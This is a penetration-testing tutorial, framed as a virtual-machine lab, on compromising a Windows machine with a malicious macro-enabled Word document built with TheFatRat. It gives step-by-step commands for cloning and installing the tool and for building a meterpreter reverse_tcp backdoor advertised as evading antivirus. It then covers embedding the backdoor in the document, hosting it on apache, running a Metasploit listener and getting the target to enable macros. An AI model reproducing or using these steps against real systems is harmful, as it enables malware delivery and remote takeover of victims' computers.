Network-Servers-Penetration-Guides-and-Tools
Hacking Windows with Malicious Office Document using TheFatRat
TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled malware can be executed on Linux, Windows, Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.
Official Repository: https://github.com/Screetsec/TheFatRat
Objectives
- How to use an office document to exploit a windows machine.
Requisites
- Windows Server 2016/2012 virtual machine.
- Kali linux virtual machine.
Set up TheFatRat
TheFatRat provides an easy way to create backdoors and payloads which can bypass most anti-virus systems.
Setting up
- Go to your Kali machine and open the Terminal.
- Navigate to the /opt/ folder.
cd /opt - Clone the original github repository from FatRat:
git clone https://github.com/Screetsec/TheFatRat.git - Change the folder permissions:
chmod -R 755 /opt/TheFatRat/ - Go to the TheFatRat folder:
cd TheFatRat/ - Execute the bash file (setup.sh) to begin the installation:
./setup.sh
An Updating Kali Repo xterm window will popup as shown below:
Make a Backdoor File
After the installation is complete, in the Terminal, type fatrat and hit enter.
When FatRat launches, starts to verify the installed dependencies, you will get multiple prompts, just type Enter to continue.
On the FatRat menu, choose [06] Create Fud Backdoor 1000% with PwnWindws [Excelent] by typing 6.
PwnWinds menu appears as shown above, choose the [3] Create exe file with apache + Powershell (FUD 100%) by typing 3 in the menu.
Set the LHOST IP to your Kali IP; LPORT to 4444 and the output to payload as show above.
Next, chose [3] windows/meterpreter/reverse_tcp by typing 3.
If everything works, fatrat will generate a payload.exe file located on /root/Fatrat_Generated/ as shown below:
Backdoor Saved To : /root/Fatrat_Generated/payload.exe
Make a Malicious Word File
Go back to the main menu by choosing [9] Back to menu.
On the main menu, choose the [07] Create Backdoor For Office with Microsploit
On the Microsploit menu, choose [2] The Microsoft Office Macro on Windows by typing 2.
The next configurations will be:
LHOST IP: [Your Kali IP]LPORT: 4444Enter the base name for output files: EvilDocEnter the message for the document body: you have been PWNED :)- The next prompt will ask if you want to use a custom exe to file backdoor. Choose
yfor yes. - Specify the exactly path to your payload.exe that you generated on the beginings of this lab: /root/Fatrat_Generated/payload.exe
- On the Payload Option, choose the [3] windows/meterpreter/reverse_tcp by typing
3. Navigate to output folder of FatRat to you will see the generated Word file.
Set Up a Listener
Open another Terminal window and launch metasploit by typing: msfconsole.
Select the multi/handler:
use multi/handler
Set the payload to meterpreter/reverse_tcp:
set payload windows/meterpreter/reverse_tcp
Set the LHOST to your Kali IP and LPORT to 4444:
set LHOST 10.0.2.42
set LPORT 4444
Type run to start the listener:
run
Share the Malicious Doc File
To share the malicious file to Windows machine, copy the Doc file to the apache folder. Open a new Terminal window and type:
cp /root/Fatrat_Generated/EvilDoc.docm /var/www/html/share/
Then, start the apache service:
service apache2 start
Open the Malicious doc
Switch to your Windows machine and open the browser.
Type the URL (based on your Kali IP):
http://10.0.2.42/share/
Then, download the malicious doc that you generated.
Open the downloads folder and click the MS Word file.
MS Word open the file in Protected View. Click Enable Editing as shown below:
If you got the SECURITY WARNING because of the Macros, click on Enable Content.
Now Switch back to the Kali, if everything works, you will find that have a Meterpreter session open in the Metasploit terminal.
Now you can view the exploited system details and so on. Informally you can call this action ‘profit’ :)